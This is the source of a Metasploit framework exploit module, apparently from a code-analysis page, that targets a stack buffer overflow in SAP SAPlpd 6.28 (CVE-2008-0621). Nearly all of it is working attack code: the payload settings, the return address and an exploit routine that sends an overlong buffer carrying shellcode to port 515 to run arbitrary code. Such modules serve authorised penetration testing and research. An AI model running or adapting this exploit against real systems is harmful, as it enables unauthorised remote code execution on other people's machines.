rapid7/metasploit-framework

View on GitHub
modules/exploits/windows/lpd/saplpd.rb

Summary

Maintainability
A
0 mins
Test Coverage
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'SAP SAPLPD 6.28 Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in SAPlpd 6.28 (SAP Release 6.40) .
        By sending an overly long argument, an attacker may be able to execute arbitrary
        code.
      },
      'Author'         => 'MC',
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2008-0621' ],
          [ 'OSVDB', '41127' ],
          [ 'BID', '27613' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Payload'        =>
        {
          'Space'    => 400,
          'BadChars' => "\x00\x0a",
          'StackAdjustment' => -3500,
          'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'SAPlpd 6.28.0.1 (SAP Release 6.40)',   { 'Ret' => 0x005e72d7 } ], #SAPlpd.exe 3/7/2006
        ],
      'Privileged'     => true,
      'DisclosureDate' => '2008-02-04',
      'DefaultTarget'  => 0))

    register_options([Opt::RPORT(515)], self)
  end

  def exploit
    connect

    sploit =  "\x02"
    sploit << rand_text_alpha_upper(484 - payload.encoded.length)
    sploit << payload.encoded
    sploit << [target.ret].pack('V')
    sploit << [0xe9, -375].pack('CV')

    print_status("Trying target #{target.name}...")

    sock.puts(sploit)

    handler
    disconnect
  end
end